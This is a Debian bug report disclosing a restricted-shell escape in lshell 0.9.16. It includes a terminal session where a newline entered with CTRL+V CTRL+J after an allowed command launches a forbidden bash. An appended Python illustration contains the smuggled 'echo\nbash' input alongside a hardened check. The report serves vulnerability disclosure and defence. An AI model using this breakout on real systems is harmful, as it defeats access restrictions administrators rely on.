Package: lshell
Version: 0.9.16-1
Severity: grave
Tags: security upstream
Justification: user security hole
From: Vladislav Yarmak <yarmak.vladis...@gmail.com>
To: Debian Bug Tracking System <sub...@bugs.debian.org>
Subject: lshell: Shell outbreak with multiline commands
Message-ID: <20160820194404.1737.15528.reportbug@debian>
X-Mailer: reportbug 6.6.3
Date: Sat, 20 Aug 2016 22:44:04 +0300
X-Debbugs-Cc: Debian Security Team <t...@security.debian.org>, Debian Testing Security Team <secure-testing-t...@lists.alioth.debian.org>

Just type <CTRL+V><CTRL+J> after any allowed command and then type the desired restricted command:

root@debian:~# getent passwd testuser
testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell
root@debian:~# su - testuser
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo
bash
testuser@debian:~$ ps -f
UID        PID  PPID  C STIME TTY          TIME CMD
testuser  1641  1640  0 22:27 pts/1    00:00:00 /usr/bin/python /usr/bin/lshell
testuser  1642  1641  0 22:27 pts/1    00:00:00 sh -c set -m; echo bash
testuser  1643  1642  0 22:27 pts/1    00:00:00 bash
testuser  1648  1643  0 22:27 pts/1    00:00:00 ps -f

The problem exists in the current upstream code. There is an open issue on GitHub but no reaction yet: https://github.com/ghantoos/lshell/issues/149.

The command parser in this shell is beyond recovery. I recommend replacing this shell with a symlink to /usr/sbin/nologin.
-- System Information:
Debian Release: 8.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages lshell depends on:
ii  adduser  3.113+nmu3
ii  python   2.7.9-1

lshell recommends no packages.

lshell suggests no packages.

-- no debconf information
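
Added example, not part of the original report and not lshell's own code: a simplified model of why a first-word allow-list check passes a line with an embedded newline while `sh -c` (visible in the `ps -f` output above) runs it as two commands, next to a stricter check that never hands user text to a shell. The function names, the separator list and the sample input are assumptions made for illustration.

```python
import re
import shlex

# Allowed commands as listed by '?' in the report's session.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}

# Separators a line-oriented filter typically knows about. Newline is missing,
# yet `sh -c` treats it as a command terminator just like ';'.
KNOWN_SEPARATORS = re.compile(r";|&&|\|\||\|")


def naive_is_allowed(line):
    """Simplified model of a first-word allow-list check (not lshell's code)."""
    for part in KNOWN_SEPARATORS.split(line):
        words = part.split()  # str.split() swallows '\n' as plain whitespace
        if words and words[0] not in ALLOWED:
            return False
    return True


def commands_seen_by_sh(line):
    """First word of each simple command that `sh -c line` would run."""
    parts = re.split(r";|&&|\|\||\||\n", line)
    return [p.split()[0] for p in parts if p.split()]


def hardened_argv(line):
    """Reject control and shell metacharacters, then return an argv list.

    The list can be dispatched to a builtin handler or passed to
    subprocess.run(argv, shell=False), so no shell re-parses the text.
    """
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in line):
        raise ValueError("control character in command line")
    if re.search(r"[;&|`$<>(){}\\]", line):
        raise ValueError("shell metacharacter in command line")
    argv = shlex.split(line)
    if not argv or argv[0] not in ALLOWED:
        raise ValueError("forbidden command")
    return argv


# Constructed input: the line the terminal delivers after <CTRL+V><CTRL+J>.
SAMPLE = "echo\nbash"
```

The mismatch between `naive_is_allowed(SAMPLE)` and `commands_seen_by_sh(SAMPLE)` is the parser disagreement behind the report; `hardened_argv` removes it by refusing the input instead of trying to interpret it.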